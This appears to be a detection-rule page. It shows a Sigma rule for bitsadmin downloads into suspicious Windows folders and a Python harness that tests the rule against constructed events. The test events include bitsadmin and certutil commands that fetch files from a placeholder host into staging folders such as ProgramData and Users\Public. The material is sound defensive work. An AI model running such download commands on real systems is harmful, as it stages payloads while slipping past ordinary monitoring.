File Download Via Bitsadmin To A Suspicious Target Folder
Detects usage of bitsadmin downloading a file to a suspicious target folder
Sigma rule
title: File Download Via Bitsadmin To A Suspicious Target Folder
id: 2ddef153-167b-4e89-86b6-757a9e65dcac
related:
    - id: 6e30c82f-a9f8-4aab-b79c-7c12bce6f248
      type: obsolete
    - id: 1cf465a1-2609-4c15-9b66-c32dbe4bfd67
      type: similar
status: test
description: Detects usage of bitsadmin downloading a file to a suspicious target folder
references:
    - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin
    - https://isc.sans.edu/diary/22264
    - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/
    - https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/
author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2022-06-28
modified: 2025-12-10
tags:
    - attack.persistence
    - attack.execution
    - attack.stealth
    - attack.t1197
    - attack.s0190
    - attack.t1036.003
    - attack.command-and-control
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\bitsadmin.exe'
        - OriginalFileName: 'bitsadmin.exe'
    selection_flags:
        CommandLine|contains:
            - ' /transfer '
            - ' /create '
            - ' /addfile '
    selection_folder:
        CommandLine|contains:
            - ':\Perflogs'
            - ':\ProgramData\'
            - ':\Temp\'
            - ':\Users\Public\'
            - ':\Windows\'
            - '\$Recycle.Bin\'
            - '\AppData\Local\'
            - '\AppData\Roaming\'
            - '\Contacts\'
            - '\Desktop\'
            - '\Favorites\'
            - '\Favourites\'
            - '\inetpub\wwwroot\'
            - '\Music\'
            - '\Pictures\'
            - '\Start Menu\Programs\Startup\'
            - '\Users\Default\'
            - '\Videos\'
            - '%ProgramData%'
            - '%public%'
            - '%temp%'
            - '%tmp%'
    condition: all of selection_*
falsepositives:
    - Unknown
level: high
regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder/info.yml
simulation:
    - type: atomic-red-team
      name: Windows - BITSAdmin BITS Download
      technique: T1105
      atomic_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b
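To see how the rule's three selections combine, here is an added example written for this page (it is not part of the SigmaHQ rule, the Sigma backends, or pySigma) that evaluates the rule's logic in plain Python over a handful of constructed process_creation events. Sigma's string matching is case-insensitive by default, so every comparison lowercases both sides; `all of selection_*` is the AND of the three selections, and a list directly under a selection (as in `selection_img`) is OR-ed. All image paths, command lines, job names and the `example.invalid` host are made up for the example.

```python
"""Stand-alone evaluation of the rule's detection logic (added example, not
SigmaHQ code). Field names follow the Sigma process_creation schema."""

# Values copied from the rule's selection_flags and selection_folder lists.
FLAGS = [" /transfer ", " /create ", " /addfile "]
FOLDERS = [
    ":\\Perflogs", ":\\ProgramData\\", ":\\Temp\\", ":\\Users\\Public\\",
    ":\\Windows\\", "\\$Recycle.Bin\\", "\\AppData\\Local\\",
    "\\AppData\\Roaming\\", "\\Contacts\\", "\\Desktop\\", "\\Favorites\\",
    "\\Favourites\\", "\\inetpub\\wwwroot\\", "\\Music\\", "\\Pictures\\",
    "\\Start Menu\\Programs\\Startup\\", "\\Users\\Default\\", "\\Videos\\",
    "%ProgramData%", "%public%", "%temp%", "%tmp%",
]


def _contains_any(value, needles):
    """Sigma 'contains' over a list: case-insensitive substring, OR-ed."""
    v = value.lower()
    return any(n.lower() in v for n in needles)


def selection_img(event):
    # Two list items under the selection -> either one is enough. The
    # OriginalFileName branch is what catches a renamed copy of bitsadmin.
    image = event.get("Image", "").lower()
    ofn = event.get("OriginalFileName", "").lower()
    return image.endswith("\\bitsadmin.exe") or ofn == "bitsadmin.exe"


def selection_flags(event):
    return _contains_any(event.get("CommandLine", ""), FLAGS)


def selection_folder(event):
    return _contains_any(event.get("CommandLine", ""), FOLDERS)


def matches(event):
    # condition: all of selection_*  -> AND of the three selections
    return selection_img(event) and selection_flags(event) and selection_folder(event)


# Constructed events (not real telemetry). Note that cmd.exe expands %temp%
# before CreateProcess, so a logged command line usually carries the expanded
# path (matched by '\AppData\Local\'); the literal '%temp%' form only survives
# when the variable is passed unexpanded, which the rule also covers.
EVENTS = [
    ("T1105-style download into %temp%", {
        "Image": r"C:\Windows\System32\bitsadmin.exe",
        "OriginalFileName": "bitsadmin.exe",
        "CommandLine": r"bitsadmin.exe /transfer qcxjb7 /Priority HIGH "
                       r"https://example.invalid/file.txt %temp%\file.txt",
    }),
    ("renamed copy, caught via OriginalFileName", {
        "Image": r"C:\Users\alice\AppData\Local\Temp\svc.exe",
        "OriginalFileName": "bitsadmin.exe",
        "CommandLine": r"svc.exe /addfile job1 https://example.invalid/x.dll C:\ProgramData\x.dll",
    }),
    ("benign job listing: no download verb", {
        "Image": r"C:\Windows\System32\bitsadmin.exe",
        "OriginalFileName": "bitsadmin.exe",
        "CommandLine": "bitsadmin /list /allusers",
    }),
    ("download into a folder the rule does not list (coverage gap)", {
        "Image": r"C:\Windows\System32\bitsadmin.exe",
        "OriginalFileName": "bitsadmin.exe",
        "CommandLine": r"bitsadmin /transfer j /download https://example.invalid/t.exe D:\Builds\t.exe",
    }),
    ("other LOLBin into a listed folder: out of scope for this rule", {
        "Image": r"C:\Windows\System32\certutil.exe",
        "OriginalFileName": "CertUtil.exe",
        "CommandLine": r"certutil -urlcache -split -f https://example.invalid/a.exe C:\Users\Public\a.exe",
    }),
]


def run():
    """Evaluate every constructed event; returns [(label, matched), ...]."""
    return [(label, matches(ev)) for label, ev in EVENTS]


if __name__ == "__main__":
    for label, hit in run():
        print(f"{'ALERT' if hit else '  -  '}  {label}")
```

The fourth event is the caveat worth keeping in mind when tuning: the rule keys on a fixed list of staging folders, so a download to an unlisted path (a secondary drive, a custom application directory) is left to the broader "File Download Via Bitsadmin" rule listed below. The leading and trailing spaces in `' /transfer '` also mean a bare `bitsadmin /transfer` with no job name will not match, which is intended since such an invocation does nothing.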
Related rules
- File Download Via Bitsadmin
- File With Suspicious Extension Downloaded Via Bitsadmin
- Suspicious Download From File-Sharing Website Via Bitsadmin
- Bitsadmin to Uncommon IP Server Address
- Bitsadmin to Uncommon TLD